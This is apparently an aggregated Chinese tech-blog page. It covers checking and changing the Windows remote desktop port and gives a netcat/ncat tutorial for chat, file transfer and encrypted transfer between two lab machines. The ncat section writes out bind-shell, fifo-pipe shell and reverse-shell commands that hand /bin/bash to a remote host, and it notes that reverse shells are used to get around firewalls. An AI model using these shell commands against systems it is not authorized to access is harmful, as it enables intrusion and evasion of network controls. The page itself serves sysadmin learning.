精华内容
下载资源
问答
  • windows中以命令行查看远程端口

    千次阅读 2018-01-12 11:14:02
    在window中除注册表方式查看远程端口外,还能通过命令行查看远程端口。这里介绍通过命令行查看远程端口。 工具/原料 Windows系统(win7/8/2003/2008等Windows系统) 方法/步骤 1 打开cmd命令行,在cmd...

    在window中除注册表方式查看远程端口外,还能通过命令行查看远程端口。这里介绍通过命令行查看远程端口。

    工具/原料

    • Windows系统(win7/8/2003/2008等Windows系统)

    方法/步骤

    1. 1

      打开cmd命令行,在cmd命令行下输入:tasklist  /svc

      在输出的内容中查找svchost.exe进程下termservice服务对应的PID,在此查看的PID为:1336

      windows中以命令行查看远程端口

      windows中以命令行查看远程端口

    2. 2

      然后输入命令:netstat  -ano

      找到对应PID就能找到对应远程端口,在此远程端口为3389端口

      windows中以命令行查看远程端口

    3. 3

      如此方式不可用,可在注册表中查看:

      在运行框中输入:regedit   打开注册表,找到以下路径中的PortNumber文件,双击选择十进制可查看或修改端口

      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp\PortNumber]

      [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber] 

      windows中以命令行查看远程端口

      windows中以命令行查看远程端口

    4. 4

      在此将远程端口修改为33899,使用tasklist  /svc查看PID,因主机重启过,在此查看对应PID为:1260

      windows中以命令行查看远程端口

    5. 5

      使用netstat -ano查看对应端口,在此找到对应的端口为修改后的端口33899。

      windows中以命令行查看远程端口

    6. 6

      远程测试成功

      windows中以命令行查看远程端口

      END

    注意事项

    • 要使用命令行查看远程端口,必须保证远程服务可用

    • 注册表中的两个PortNumber文件的值是一致的,如修改端口,需修改两个文件的值并保持一致。

    展开全文
  • 修改远程端口.bat

    2019-10-15 11:14:04
    本人整理的批处理工具,用于修改windows 操作系统的远程端口工具,可以自动将端口增加到防火墙例外中,不需要手动关闭防火墙。
  • win10关闭远程端口

    千次阅读 2018-11-11 07:47:16
    1、打开网络和Internet设置 2、找到windows防火墙 3、打开高级设置 4、新建入站和出站规则,选择端口点击下一步 5、输入3389,下一步选择阻止连接 ...注:关闭远程端口目的是防止其它计算机远程操控  ...

    1、打开网络和Internet设置

    2、找到windows防火墙

    3、打开高级设置

    4、新建入站和出站规则,选择端口点击下一步

    5、输入3389,下一步选择阻止连接

    6、输入名称,点击完成

    7、如图所示即可,出站规则如上

    注:关闭远程端口目的是防止其它计算机远程操控

     

    展开全文
  • 查看远程设备端口是否开放

    千次阅读 2019-01-23 10:17:27
    linux下ncat命令可以查看远端设备是否开放某个端口 nc -uv xxx.xxx.xxx.xxx 1812  使用udp协议查看xxx.xxx.xxx.xxx的1812端口是否开放 提示connected to xxx.xxx.xxx.xxx就是已经开放 -u udp -v 详细显示信息 不...

    linux下ncat命令可以查看远端设备是否开放某个端口

    nc -uv xxx.xxx.xxx.xxx 1812 
    使用udp协议查看xxx.xxx.xxx.xxx的1812端口是否开放
    提示connected to xxx.xxx.xxx.xxx就是已经开放

    -u udp
    -v 详细显示信息
    不加u默认是TCP协议


    nmap-ncat.x86_64版nc/ncat

    nc/ncat所做的就是在两台电脑之间建立链接并返回两个数据流,在这之后所能做的事就看你的想像力了。你能建立一个服务器,传输文件,与朋友聊天,传输流媒体或者用它作为其它协议的独立客户端。
    centos 7下安装nc
    yum install nmap-ncat.x86_64 -y
    [root@localhost ~]# rpm -ql nmap-ncat
    /usr/bin/nc
    /usr/bin/ncat
    ...

    常用参数选项

    nc -h查看
    -4 使用IPV4
    -6 使用IPV6
    -c, --sh-exec <command> 接收到的命令通过command(例如/bin/bash)执行
    -e, --exec <command> 和-c差不多
    --lua-exec <filename> 接收到的数据通过脚本filename执行
    -m, --max-conns <n> 最大并发连接数(单独开启不生效,需配合--keep-open/--broker使用)
    -d, --delay <time> 读写收发间隔时间
    -o, --output <filename> 将会话数据转储到文件
    -i, --idle-timeout <time> 读写超时时间
    -p, --source-port port 指定连接使用的源端口号(client端使用)
    -s, --source addr 客户端指定连接服务器使用的ip(client端使用)
    -l, --listen 绑定和监听接入连接(server端使用)
    -k, --keep-open 在监听模式中接受多个连接(配合-m使用)
    -n, --nodns 不使用DNS解析主机名
    -t, --telnet 响应telnet连接
    -u, --udp 使用udp协议,默认tcp
    -v, --verbose 显示详细信息
    -w, --wait <time> 连接超时时间
    --allow 允许指定主机连接
    --allowfile 允许指定文件内的主机连接
    --deny 拒绝指定主机连接
    --denyfile 拒绝指定文件内的主机连接
    --broker 启用代理模式
    --proxy <addr[:port]> 指定代理主机ip和port
    --proxy-type <type> 指定代理类型("http" or "socks4")
    --proxy-auth <auth> 代理身份验证

    实例:

    主机A:192.168.1.130

    主机B:192.168.1.120

    1、chat server:简单传输数据服务器

    假如你想和你的朋友聊聊,有很多的软件和信息服务可以供你使用。但是,如果你没有这么奢侈的配置,比如你在计算机实验室,所有的对外的连接都是被限制的,你怎样和整天坐在隔壁房间的朋友沟通那?不要郁闷了,netcat提供了这样一种方法,你只需要创建一个Chat服务器,一个预先确定好的端口,这样子他就可以联系到你了。

    Server A

    复制代码
    [root@localhost tmp]# ncat -v -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:34356.
    hello world!!!
    复制代码

    nc/ncat 命令在8081端口启动了一个tcp 服务器,所有的标准输出和输入会输出到该端口。输出和输入都在此shell中展示。

    Client B

    [root@localhost ~]# nc -v 192.168.1.130 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    hello world!!!
    不管你在机器B上键入什么都会出现在机器A上。

    2、文件传输

    大部分时间中,我们都在试图通过网络或者其他工具传输文件。有很多种方法,比如FTP,SCP,SMB等等,但是当你只是需要临时或者一次传输文件,真的值得浪费时间来安装配置一个软件到你的机器上嘛。假设,你想要传一个文件file.txt 从A 到B。A或者B都可以作为服务器或者客户端,以下,让A作为服务器,B为客户端。

    Server A

    [root@localhost tmp]# ncat -v -lp 8081 < file.txt 
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:34358.
    Client B

    复制代码
    [root@localhost ~]# ll
    total 4
    -rw-------. 1 root root 1238 Sep 19 12:19 anaconda-ks.cfg
    [root@localhost ~]# nc -v 192.168.1.130 8081 > file.txt
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    ^C
    [root@localhost ~]# ll
    total 40220
    -rw-------. 1 root root 1238 Sep 19 12:19 anaconda-ks.cfg
    -rw-r--r--. 1 root root 41180832 Sep 19 14:33 file.txt
    复制代码
    这里我们创建了一个服务器在A上并且重定向netcat的输入为文件file.txt,那么当任何成功连接到该端口,netcat会发送file的文件内容。

    在客户端我们重定向输出到file.txt,当B连接到A,A发送文件内容,B保存文件内容到file.txt.

    没有必要创建文件源作为Server,我们也可以相反的方法使用。像下面的我们发送文件从B到A,但是服务器创建在A上,这次我们仅需要重定向netcat的输出并且重定向B的输入文件。

    B作为Server

    Server A

    [root@localhost tmp]# ncat -v -lp 8081 > file.txt 
    ...
    Client B

    [root@localhost ~]# nc -v 192.168.1.130 8081 < file.txt
    3、目录传输

    发送一个文件很简单,但是如果我们想要发送多个文件,或者整个目录,一样很简单,只需要使用压缩工具tar,压缩后发送压缩包。

    如果你想要通过网络传输一个目录从A到B。

    Server A

    复制代码
    [root@localhost tmp]# tar cvf - nc_dir | nc -v -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    nc_dir/
    nc_dir/an
    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:34362.
    nc_dir/yum.log
    复制代码
    Client B

    复制代码
    [root@localhost ~]# ll
    total 40220
    -rw-------. 1 root root 1238 Sep 19 12:19 anaconda-ks.cfg
    -rw-r--r--. 1 root root 41180832 Sep 19 14:33 file.txt
    [root@localhost ~]# nc -nv 192.168.1.130 8081 | tar xvf -
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    nc_dir/
    nc_dir/an
    nc_dir/yum.log^C
    [root@localhost ~]# ll
    total 40220
    -rw-------. 1 root root 1238 Sep 19 12:19 anaconda-ks.cfg
    -rw-r--r--. 1 root root 41180832 Sep 19 14:33 file.txt
    drwxr-xr-x. 2 root root 31 Sep 20 2017 nc_dir
    复制代码
    这里在A服务器上,我们创建一个tar归档包并且通过-在控制台重定向它,然后使用管道,重定向给netcat,netcat可以通过网络发送它。

    在客户端我们下载该压缩包通过netcat 管道然后打开文件。

    如果想要节省带宽传输压缩包,我们可以使用bzip2或者其他工具压缩。

    通过bzip2压缩

    Server A

    复制代码
    [root@localhost tmp]# tar cvf - nc_dir | bzip2 -z | nc -v -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    nc_dir/
    nc_dir/an
    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:34372.
    nc_dir/yum.log
    复制代码
    使用bzip2解压

    Client B

    复制代码
    [root@localhost ~]# ll
    total 40220
    -rw-------. 1 root root 1238 Sep 19 12:19 anaconda-ks.cfg
    -rw-r--r--. 1 root root 41180832 Sep 19 14:33 file.txt
    [root@localhost ~]# nc -nv 192.168.1.130 8081 | bzip2 -d | tar xvf -
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    nc_dir/
    nc_dir/an
    nc_dir/yum.log^C
    [root@localhost ~]# ll
    total 40220
    -rw-------. 1 root root 1238 Sep 19 12:19 anaconda-ks.cfg
    -rw-r--r--. 1 root root 41180832 Sep 19 14:33 file.txt
    drwxr-xr-x. 2 root root 31 Sep 20 2017 nc_dir
    复制代码
    4、加密你通过网络发送的数据

    如果你担心你在网络上发送数据的安全,你可以在发送你的数据之前用如mcrypt的工具加密。

    服务端 A

    复制代码
    [root@localhost tmp]# mcrypt --flush --bare -F -q -m ecb < file.txt | nc -v -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    Enter the passphrase (maximum of 512 characters)
    Please use a combination of upper and lower case letters and numbers.
    Enter passphrase: 
    Enter passphrase:

    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:34392.
    复制代码
    使用mcrypt工具加密数据。

    客户端 B

    复制代码
    [root@localhost tmp]# ll
    total 402160
    -rw-r--r--. 1 root root 411808322 Sep 19 14:56 test.txt
    [root@localhost tmp]# nc 192.168.1.130 8081 | mcrypt --flush --bare -F -q -d -m ecb > file.txt
    Enter passphrase: 
    ^C
    [root@localhost tmp]# ll
    total 442376
    -rw-r--r--. 1 root root 41180832 Sep 19 15:13 file.txt
    -rw-r--r--. 1 root root 411808322 Sep 19 14:56 test.txt
    复制代码
    使用mcrypt工具解密数据。

    以上两个命令会提示需要密码,确保两端使用相同的密码。

    这里我们是使用mcrypt用来加密,使用其它任意加密工具都可以。

    5、打开一个shell

    我们已经用过远程shell-使用telnet和ssh,但是如果这两个命令没有安装并且我们没有权限安装他们,我们也可以使用netcat创建远程shell。

    假设你的netcat支持 -c -e 参数(默认 netcat)

    Server A

    [root@localhost tmp]# nc -v -c /bin/bash -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:34404.
    Client B

    复制代码
    [root@localhost tmp]# nc -v 192.168.1.130 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    ip add
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
    valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:0a:cb:57 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.130/24 brd 192.168.1.255 scope global ens33
    valid_lft forever preferred_lft forever
    inet6 fe80::21af:eea9:759a:962f/64 scope link 
    valid_lft forever preferred_lft forever
    复制代码
    这里我们已经创建了一个netcat服务器并且表示当它连接成功时执行/bin/bash

    假如netcat 不支持-c 或者 -e 参数(openbsd netcat),我们仍然能够创建远程shell

    Server A

    [root@server-A ~]# mkfifo /tmp/tmp_fifo
    [root@server-A ~]# cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -v -lp 8081 > /tmp/tmp_fifo
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    这里我们创建了一个fifo文件,然后使用管道命令把这个fifo文件内容定向到shell 2>&1中。是用来重定向标准错误输出和标准输出,然后管道到netcat 运行的端口8081上。至此,我们已经把netcat的输出重定向到fifo文件中。

    说明:

    从网络收到的输入写到fifo文件中

    cat 命令读取fifo文件并且其内容发送给bash命令

    bash命令进程受到输入并把它写回到netcat。

    netcat 通过网络发送输出到client

    至于为什么会成功是因为管道使命令平行执行,fifo文件用来替代正常文件,因为fifo使读取等待而如果是一个普通文件,cat命令会尽快结束并开始读取空文件。

    在客户端仅仅简单连接到服务器

    Client B

    复制代码
    [root@client-B ~]# nc 192.168.1.130 8081
    [root@server-A ~]# ip add
    ip add
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
    valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:0a:cb:57 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.130/24 brd 192.168.1.255 scope global ens33
    valid_lft forever preferred_lft forever
    inet6 fe80::21af:eea9:759a:962f/64 scope link 
    valid_lft forever preferred_lft forever
    [root@server-A ~]# 
    复制代码
    你会得到一个shell提示符在客户端

    反向shell

    反向shell是指在客户端打开的shell。反向shell这样命名是因为不同于其他配置,这里服务器使用的是由客户提供的服务。

    服务端 A

    复制代码
    [root@server-A ~]# nc -v -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:34414.
    ls
    anaconda-ks.cfg
    file.txt
    nc_dir
    ip add
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
    valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:b9:7e:94 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.106/24 brd 192.168.1.255 scope global dynamic ens33
    valid_lft 7170sec preferred_lft 7170sec
    inet6 fe80::b95d:60d:d901:d271/64 scope link 
    valid_lft forever preferred_lft forever
    3: ens34: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:b9:7e:9e brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.120/24 brd 192.168.1.255 scope global ens34
    valid_lft forever preferred_lft forever
    inet6 fe80::2812:38ee:6773:1a7c/64 scope link 
    valid_lft forever preferred_lft forever
    复制代码
    在客户端,简单地告诉netcat在连接完成后,执行shell。

    客户端 B

    [root@client-B ~]# nc -v 192.168.1.130 8081 -c /bin/bash 
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    现在,什么是反向shell的特别之处呢 
    反向shell经常被用来绕过防火墙的限制,如阻止入站连接。

    6、指定源端口

    假设你的防火墙过滤除25端口外其它所有端口,你需要使用-p选项指定源端口。

    服务器端 A

    [root@server-A ~]# nc -v -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    Ncat: Connection from 192.168.1.120.
    Ncat: Connection from 192.168.1.120:8082.
    客户端 B

    [root@client-B ~]# nc -v 192.168.1.130 8081 -p 8082
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    使用1024以内的端口需要root权限。

    该命令将在客户端开启25端口用于通讯,否则将使用随机端口。

    7、指定源地址

    假设你的机器有多个地址,希望明确指定使用哪个地址用于外部数据通讯。我们可以在netcat中使用-s选项指定ip地址。

    服务器端

    [root@server-A ~]# nc -v -lp 8081
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Listening on :::8081
    Ncat: Listening on 0.0.0.0:8081
    Ncat: Connection from 192.168.1.106.
    Ncat: Connection from 192.168.1.106:44694.
    客户端 B

    复制代码
    [root@localhost log]# ip add
    1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
    valid_lft forever preferred_lft forever
    2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:b9:7e:94 brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.106/24 brd 192.168.1.255 scope global dynamic ens33
    valid_lft 6803sec preferred_lft 6803sec
    inet6 fe80::b95d:60d:d901:d271/64 scope link 
    valid_lft forever preferred_lft forever
    3: ens34: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:b9:7e:9e brd ff:ff:ff:ff:ff:ff
    inet 192.168.1.120/24 brd 192.168.1.255 scope global ens34
    valid_lft forever preferred_lft forever
    inet6 fe80::2812:38ee:6773:1a7c/64 scope link 
    valid_lft forever preferred_lft forever
    复制代码
    [root@client-B ~]# nc -v 192.168.1.130 8081 -s 192.168.1.106
    Ncat: Version 6.40 ( http://nmap.org/ncat )
    Ncat: Connected to 192.168.1.130:8081.
    该命令将绑定地址192.168.1.106。

    这仅仅是使用netcat的一些示例。

    其它用途有:

    使用-t选项模拟Telnet客户端,
    HTTP客户端用于下载文件,
    连接到邮件服务器,使用SMTP协议检查邮件,
    使用ffmpeg截取屏幕并通过流式传输分享,等等。其它更多用途。

    简单来说,只要你了解协议就可以使用netcat作为网络通讯媒介,实现各种客户端。

    展开全文
  • 3389远程端口登录器

    2008-12-08 13:51:19
    MSTSC命令,3389端口登录器。远程控制电脑
  • 端口转发工具,可以将电脑端口映射到其他电脑端口端口转发工具,可以将电脑端口映射到其他电脑端口
  • 查看电脑正在使用的端口,还有协议,程序路径,远程端口
  • 如何修改服务器远程端口

    千次阅读 2019-05-27 14:30:14
    1、开始--运行--regedit 2、依次展开 HKEY_LOCAL_MACHINE/SYSTEM/...右边键值中 PortNumber 改为你想用的端口号如:8888,注意使用十进制。如下图: 3、依次展开HKEY_LOCAL_MACHINE/SYSTEM/CURREN...

    1、开始--运行--regedit

    2、依次展开 HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WDS/RDPWD/TDS/TCP

    右边键值中 PortNumber 改为你想用的端口号如:8888,注意使用十进制。如下图:

    3、依次展开HKEY_LOCAL_MACHINE/SYSTEM/CURRENTCONTROLSET/CONTROL/TERMINAL SERVER/WINSTATIONS/RDP-TCP/

    右边键值中 PortNumber 改为你想用的端口号如:8888,注意使用十进制。如下图:

    如果用户计算机的防火墙是关闭的,那么现在就可以在另外一台电脑上通过远程桌面连接电脑了。

    4、防火墙中的出入站规则3389端口,修改为新设置的8888

    通常为了服务器/系统安全,都会保留防火墙的开启状态。因此还需要修改防火墙的入站规则。

    右键电脑,点击属性进入,点击左上角“控制面板”,找到“windows 防火墙”,此时防火墙处于开启状态。点击右侧“高级设置”-->“入站规则”,将滚动条到底,即可看见名称为“远程桌面(TCP-In)”的入站规则,可以看见其默认端口还是“3389”,而没有我们刚改过的“8888”的规则。需要将“3389”改成“8888”,这里有两种方法:方法一:直接在防火墙规则中加入一个新的端口8888;方法二:修改原来的远程端口,但是这里无法直接更改,需要到注册表进行更改。

    同样通过regedit命令,进入注册表编辑器,找到HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Defaults\FirewallPolicy\FirewallRules项,将RemoteDesktop-UserMode-In-TCP的值中包含3389的数据改成8888。

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules,将RemoteDesktop-UserMode-In-TCP的值中包含3389的数据改成8888。

    进入防火墙的入站规则(注意:需要把之前的窗口关闭,重新进入控制面板,进入防火墙,并进入入站规则)或点击刚才入站规则窗口的菜单“操作”-->“刷新”,可以看见“远程桌面(TCP-In)”的入站规则的端口号已经变成8888了。

    (1)查看刚才的入站规则“远程桌面(TCP-In)”是否为灰色状态,若为灰色状态,表示该规则没有启动,必须右键启用规则,此时变为彩色的启动状态。

    (2)右键入站规则“远程桌面(TCP-In)”,点击“属性”,选择“高级”选项卡,查看下面的配置文件区域,把“域”、“专用”和“公用”几个复选框都选上,以保证对所有网络连接类型都适用。到此远程桌面端口修改+防火墙设置已经完美解决。在另外一台电脑打开远程桌面软件,在“计算机”一栏输入“ip:8888”进行连接,其中<IP>是指要连接的电脑的IP地址,例如:192.168.1.21:8888。

     

    5、修改完毕,重新启动服务器,设置生效。

    端口号修改完成,重启电脑 或 右键“计算机”,点击“管理”,弹出的窗口左侧选“服务和应用程序”-->"服务",找到“Remote Desktop Services”,右击,选择“重新启动”,即可使更改后的端口生效。

    展开全文
  • Mac下远程端口连通性测试命令

    千次阅读 2020-10-09 11:04:53
    命令: nc -vz -w 2 IPPort 只要接收到这样的结果,就代表成功了! Connection to xxx.xxx.xxx.xxxport 32323 [tcp/*] succeeded!
  • 为了保护自己的信息,我们可以将远程桌面的端口进行修改,使有恶意的人不至于通过3389的端口进入我们的机器。下面介绍的就是windows修改远程桌面的操作。 实际上,windows7、windows10、windows server2012等的操作...
  • 无需公网IP 无需端口映射, 远程工具 同步文件,大数据下发,远程协助控制电脑,XX版还可以开启远程摄像头,,,功能强大,,欢迎下载,
  • 转载自小a玖拾柒的博客 telnet命令通常用来远程登录。telnet程序是基于TELNET协议...在终端使用者的电脑上使用telnet程序,用它连接到服务器。终端使用者可以在telnet程序中输入命令,这些命令会在服务器上运行,就...
  • 如何查看和修改Windows远程桌面端口

    千次阅读 2020-02-21 17:02:01
    因此今天带大家一起学习下,如何查看和修改Windows远程桌面的默认端口。 一、查看Windows远程桌面端口 整体思路:根据进程查端口号 1)查看远程桌面服务TermService进程PID 选择 开始 > 运行,输入 cmd,打开...
  • 图解用NetCat连接远程端口

    万次阅读 2016-08-02 17:29:53
    一 Netcat使用手册 简介: 在网络工具中有“瑞士军刀”美誉的NetCat(以下简称nc),在我们用了N年了至今仍是爱不释手。因为它短小精悍(这个用在它身上很适合,现在有人已经将其修改成大约...监听端口等待连接: nc
  • 有关路由器端口映射实现3389远程连接内网电脑,以及如何修改3389默认端口
  • 更改远程端口(mstsc)

    千次阅读 2010-08-24 18:05:00
    众所周知,远程终端服务基于端口3389。入侵者一般先扫描主机开放端口,一旦发现其开放了3389端口,就会进行下一步的入侵,所以我们只需要修改该务默认端口就可以避开大多数入侵者的耳目。 步骤: 1...
  • 一键修改电脑端口

    2015-12-30 14:26:26
    电脑"端口"是英文port的义译,可以认为是计算机与外界通讯交流的出口。 手动修改远程登陆端口 大家知道这个是远程桌面连接的端口 一旦被陌生人连上 会是很危险的 所以我们要学会修改默认端口
  • 使用Windows命令窗口查看远程主机的端口是否开启或者是否可以连接,大致上可以分为两步。 1.确认远程主机的ip是否可以连通,使用ping命令:ping  显示如下图则说明可以连通。   2. 确认端口是否正在被监听...
  • centos7系统,即使关闭 firewalld,但是除了22端口,其余端口无法被外界访问,本地访问正常。 我出现这个问题是因为浏览器缓存问题,可以清空浏览器缓存,并重新打开浏览器就好使了。 根据下面命令,打开 ...
  • JAVA技术交流QQ群:170933152 ...2.在centos中查看端口是否打开: [root@localhost bin]# netstat -tlunp Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State ...
  • 查看电脑开放了哪些端口

    万次阅读 2012-06-23 17:26:47
    一、如何查看电脑开放了哪些端口 1、利用netstat命令 Windows提供了netstat命令,可以显示当前的 TCP/IP 网络连接情况。 方法:开始——程序——附件——命令提示符,进入DOS窗口,输入命令 netstat -na 回车,就...
  • 宽带路由器端口映射 远程控制电脑

    千次阅读 2012-06-16 17:35:26
    图解宽带路由器端口映射 远程控制电脑,关于很多的宽带路由器端口映射问题,都是涉及到远程控制电脑的,所以要先了解远程控制电脑的一些基本知识才能为以后的日志配置做好准备。 宽带路由器端口映射方案一:由于...
  • 查看电脑端口的状态

    千次阅读 2007-03-26 10:47:00
    1.计算机端口是计算机与外界通讯交流的出口, 2.使用Windows自带的netstat命令来检查一下机器开放的端口,进入到命令行下,使用netstat命令的a和n两个参数,显示结果如下所示: C:/>netstat -an Active Connections ...
  • 最近开始使用远程服务器开始跑程序,由于tensorboard生成文件过大,每次拉到自己电脑上跑简直就是灾难,然后我就在各种百度什么SSH之类的,由于对这个不是特别专业,看了半天大神们各种命令也是恍恍惚惚,什么ssh -...
  • 电脑远程唤醒

    2012-10-24 16:32:17
    电脑远程唤醒的实现方案:必须使用路由器上网,路由器必须开着。以我使用的FAST-FW150R路由器为例,在转发规则里设置端口转发如下:端口号7,IP地址192.168.2.2(要唤醒的电脑的IP),协议UDP。DMZ主机不用设置。IP...
  • Windows10操作系统的酷炫和强大已经深受用户们的喜欢了,这里根大家分享的是教你查看win10电脑端口是否被占用的技巧,端口是我们在进行远程或者打印机等都会遇到的,但是有很多用户会遇到端口被占用的情况,遇到这样...
  • 如何使用命令查看电脑开放的端口

    千次阅读 2015-09-08 17:54:48
    当前最为常见的木马通常是基于TCP/UDP协议进行client端与server端之间的通讯的,既然利用到这两个协议,就...那么,我们可以利用查看本机开放端口的方法来检查自己是否被种了木马或其它hacker程序。以下是详细方法介绍
  • 在不想使用第三方软件的情况下,远程控制家里电脑,发现网上说的都是控制同一局域网内的电脑的方法,所以总结一下远程控制其他电脑的教程: 首先远程控制其他电脑分两种情况:1、这两台电脑在同一局域网内;...
  • 如何查看电脑开放了哪些端口

    万次阅读 2010-12-07 20:04:00
    一、如何查看电脑开放了哪些端口 1、利用netstat命令 Windows提供了netstat命令,可以显示当前的 TCP/IP 网络连接情况。 方法:开始——程序——附件——命令提示符,进入DOS窗口,输入命令 ...

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 74,941
精华内容 29,976
关键字:

如何查看电脑远程端口